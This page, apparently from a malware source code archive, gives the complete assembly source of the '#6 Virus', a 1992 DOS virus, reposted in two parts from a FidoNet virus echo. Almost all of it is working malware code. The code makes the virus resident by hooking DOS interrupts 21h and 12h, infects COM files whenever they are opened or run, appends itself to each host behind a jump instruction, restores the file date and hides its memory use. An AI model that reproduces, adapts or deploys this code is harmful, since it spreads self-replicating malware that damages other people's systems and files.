mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-05 09:55:27 +00:00
395 lines
12 KiB
NASM
395 lines
12 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 49 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : NUMBER_6.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56)
|
||
;* To : Fred Lee
|
||
;* Subj : NUMBER_6.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
|
||
;*****************************************************************************
|
||
; #6 Virus *
|
||
; *
|
||
; Assembled with Tasm 2.5 *
|
||
; (c) 1992 Trident/Dark Helmet, The Netherlands *
|
||
; *
|
||
; The author(s) take(s) no responsibility for any damaged caused by *
|
||
; this virus. *
|
||
;*****************************************************************************
|
||
|
||
.RADIX 16
|
||
virus SEGMENT
|
||
MODEL SMALL
|
||
ASSUME cs:virus, ds:virus, es:virus
|
||
ORG 100h
|
||
|
||
len EQU OFFSET last - begin
|
||
|
||
dummy: DB 0e9h,02h,00h,86h,54h ; Jump to start of
|
||
; viruscode.
|
||
begin: CALL start ; make a call to
|
||
; push the IP on the
|
||
; stack.
|
||
start: POP bp ; get the IP of the
|
||
; stack.
|
||
SUB bp,108h ; adjust BP (=IP)
|
||
; for offset of DATA.
|
||
|
||
restore: MOV di,0100h ; copy the original
|
||
LEA si,ds:[carrier_begin+bp] ; host begin code back.
|
||
MOV cx,05h
|
||
REP MOVSB
|
||
|
||
check: MOV ah,0a0h ; check if virus
|
||
INT 21h ; allready resident.
|
||
CMP ax,8654h
|
||
JE end_virus
|
||
|
||
memory: MOV ax,cs ; DS = Memory Control
|
||
DEC ax ; Blok (MCB).
|
||
MOV ds,ax
|
||
CMP BYTE PTR ds:[0000],5ah ; check first byte if
|
||
JNE abort ; last MCB.
|
||
MOV ax,ds:[0003] ; decrease memory size.
|
||
SUB ax,40
|
||
MOV ds:[0003],AX
|
||
|
||
PUSH cs ; restore ds.
|
||
POP ds
|
||
|
||
install: MOV bx,ax ; ES point where
|
||
MOV ax,es ; to copy virus in
|
||
ADD ax,bx ; memory.
|
||
MOV es,ax
|
||
|
||
MOV cx,len ; copy virus to
|
||
LEA si,ds:[begin+bp] ; memory.
|
||
LEA di,es:0105 ; offset = 105
|
||
REP MOVSB
|
||
MOV [virus_segment+bp],es ; store virus_segment
|
||
|
||
PUSH cs ; restore es
|
||
POP es
|
||
|
||
hook_vectors: CLI
|
||
|
||
MOV ax,3521h ; hook int 21h
|
||
INT 21h
|
||
MOV ds,[virus_segment+bp]
|
||
MOV old_21h,bx
|
||
MOV old_21h+2,es
|
||
MOV dx,offset main_virus
|
||
MOV ax,2521h
|
||
INT 21h
|
||
|
||
MOV ax,3512h ; hook int 12h
|
||
INT 21h
|
||
MOV old_12h,bx
|
||
MOV old_12h+2,es
|
||
MOV dx,offset new_12h
|
||
MOV ax,2512h
|
||
INT 21h
|
||
|
||
STI
|
||
|
||
abort: MOV ax,cs ; restore ds,es
|
||
MOV ds,ax
|
||
MOV es,ax
|
||
|
||
end_virus: MOV bx,0100h ; jump to begin host
|
||
PUSH bx
|
||
XOR bx,bx
|
||
XOR bp,bp
|
||
XOR ax,ax
|
||
XOR cx,cx
|
||
RET
|
||
|
||
;*****************************************************************************
|
||
; *
|
||
; This part will intercept the interuptvectors and copy itself to *
|
||
; other host programs *
|
||
; *
|
||
;*****************************************************************************
|
||
|
||
main_virus: PUSHF
|
||
CMP ah,0a0h ; check if virus calls
|
||
JNE new_21h ; and return id.
|
||
MOV ax,8654h
|
||
POPF
|
||
IRET
|
||
|
||
new_21h: PUSH ds ; new interupt 21
|
||
PUSH es ; routine
|
||
PUSH di
|
||
PUSH si
|
||
PUSH ax
|
||
PUSH bx
|
||
PUSH cx
|
||
PUSH dx
|
||
PUSH sp
|
||
PUSH bp
|
||
|
||
check_open: CMP ah,3dh ; check if a file is
|
||
JNE check_exec ; being opened
|
||
JMP chk_com
|
||
|
||
check_exec: CMP ax,04b00h ; check if a file is
|
||
JNE continu ; executed
|
||
JMP chk_com
|
||
|
||
continu: POP bp
|
||
POP sp
|
||
POP dx ; continu with
|
||
POP cx ; interrupt
|
||
POP bx
|
||
POP ax
|
||
POP si
|
||
POP di
|
||
POP es
|
||
POP ds
|
||
POPF
|
||
JMP DWORD PTR cs:[old_21h]
|
||
|
||
chk_com: MOV cs:[name_seg],ds
|
||
MOV cs:[name_off],dx
|
||
CLD ; check if extension
|
||
MOV di,dx ; is COM file
|
||
PUSH ds
|
||
POP es
|
||
MOV al,'.'
|
||
REPNE SCASB
|
||
CMP WORD PTR es:[di],'OC'
|
||
JNE continu
|
||
CMP WORD PTR es:[di+2],'M'
|
||
JNE continu
|
||
|
||
CMP WORD PTR es:[di-7],'MO' ; Check for
|
||
JNE error ; COMMAND.COM
|
||
CMP WORD PTR es:[di-5],'AM'
|
||
JNE error
|
||
CMP WORD PTR es:[di-3],'DN'
|
||
JE continu
|
||
|
||
error: CALL int24h ; take care of error
|
||
; messages
|
||
CALL set_atribute ; set atribute for
|
||
; writing
|
||
|
||
open_file: MOV ds,cs:[name_seg] ; open file
|
||
MOV dx,cs:[name_off]
|
||
MOV ax,3d02h
|
||
CALL do_int21h
|
||
JC close_file
|
||
PUSH cs
|
||
POP ds
|
||
MOV [handle],ax
|
||
MOV bx,ax
|
||
|
||
CALL get_date
|
||
|
||
check_infect: PUSH CS ; check if file
|
||
POP DS ; already infect
|
||
MOV BX,[handle]
|
||
MOV ah,3fh
|
||
MOV cx,05h
|
||
LEA dx,[carrier_begin]
|
||
CALL do_int21h
|
||
MOV al, BYTE PTR [carrier_begin]+3 ; look for
|
||
MOV ah, BYTE PTR [carrier_begin]+4 ; identification byte's
|
||
CMP ax,[initials]
|
||
JE save_date
|
||
|
||
get_lenght: MOV ax,4200h
|
||
CALL move_pointer
|
||
MOV ax,4202h
|
||
CALL move_pointer
|
||
SUB AX,03h
|
||
MOV [lenght_file],ax
|
||
|
||
CALL write_jmp ; write jump
|
||
; instruction.
|
||
CALL write_virus ; write virus
|
||
; body.
|
||
|
||
save_date: PUSH CS
|
||
POP DS
|
||
MOV bx,[handle]
|
||
MOV dx,[date]
|
||
MOV cx,[time]
|
||
MOV ax,5701h
|
||
CALL do_int21h
|
||
|
||
close_file: MOV bx,[handle] ; close file
|
||
MOV ah,3eh
|
||
CALL do_int21h
|
||
|
||
restore_int24h: MOV dx,cs:[old_24h] ; restore int24
|
||
MOV ds,cs:[old_24h+2] ; for critical
|
||
MOV ax,2524h ; error handling
|
||
CALL do_int21h
|
||
|
||
JMP continu
|
||
|
||
new_24h: MOV al,3
|
||
IRET
|
||
|
||
new_12h: JMP DWORD PTR cs:[old_12h]
|
||
SUB ax,50
|
||
IRET
|
||
|
||
;*****************************************************************************
|
||
|
||
move_pointer: PUSH cs
|
||
POP ds
|
||
MOV bx,[handle]
|
||
XOR cx,cx
|
||
XOR dx,dx
|
||
CALL do_int21h
|
||
RET
|
||
|
||
do_int21h: PUSHF
|
||
CALL DWORD PTR cs:[old_21h]
|
||
RET
|
||
|
||
write_jmp: PUSH CS
|
||
POP DS
|
||
|
||
MOV ax,4200h ; write jump
|
||
CALL move_pointer ; instruction
|
||
MOV ah,40h
|
||
MOV cx,01h
|
||
LEA dx,[jump]
|
||
CALL do_int21h
|
||
|
||
MOV ah,40h ; write offset of
|
||
MOV cx,02h ; jump
|
||
LEA dx,[lenght_file]
|
||
CALL do_int21h
|
||
|
||
MOV ah,40h ; write mark for
|
||
MOV cx,02h ; infection
|
||
LEA dx,[initials]
|
||
CALL do_int21h
|
||
RET
|
||
|
||
write_virus: PUSH CS
|
||
POP DS
|
||
|
||
MOV ax,4202h ; write main
|
||
CALL move_pointer ; virus body
|
||
MOV ah,40 ; at end of
|
||
MOV cx,len ; program
|
||
MOV dx,105h
|
||
CALL do_int21h
|
||
RET
|
||
|
||
get_date: MOV ax,5700h
|
||
CALL do_int21h
|
||
PUSH cs
|
||
POP ds
|
||
MOV [date],dx
|
||
MOV [time],cx
|
||
RET
|
||
|
||
int24h: MOV ax,3524h
|
||
CALL do_int21h
|
||
MOV cs:[old_24h],bx
|
||
MOV cs:[old_24h+2],es
|
||
MOV dx,offset new_24h
|
||
PUSH CS
|
||
POP DS
|
||
MOV AX,2524h
|
||
|
||
; * Message split, to be continued *
|
||
;-+- GEcho 1.00
|
||
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/d Warn if duplicate symbols in libraries
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|
||
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 50 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : [part 2] NUMBER_6.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56)
|
||
;* To : Fred Lee
|
||
;* Subj : [part 2] NUMBER_6.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
|
||
; * Continuation 1 of a split message *
|
||
|
||
CALL do_int21h
|
||
RET
|
||
|
||
set_atribute: MOV ax,4300h ; get atribute
|
||
MOV ds,cs:[name_seg]
|
||
MOV dx,cs:[name_off]
|
||
CALL do_int21h
|
||
|
||
AND cl,0feh ; set atribute
|
||
MOV ax,4301h
|
||
CALL do_int21h
|
||
RET
|
||
|
||
;*****************************************************************************
|
||
|
||
text db '#6 Virus, Trident/The Netherlands 1992'
|
||
old_12h dw 00h,00h
|
||
old_21h dw 00h,00h
|
||
old_24h dw 00h,00h
|
||
carrier_begin db 090h,0cdh,020h,086h,054h
|
||
jump db 0e9h
|
||
name_seg dw ?
|
||
name_off dw ?
|
||
virus_segment dw ?
|
||
handle dw ?
|
||
lenght_file dw ?
|
||
date dw ?
|
||
time dw ?
|
||
initials dw 5486h
|
||
last db 090h
|
||
|
||
virus ends
|
||
end dummy
|
||
|
||
;-+- GEcho 1.00
|
||
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/dSYM[=VAL] Define symbol SYM = 0, or = value VAL
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|
||
|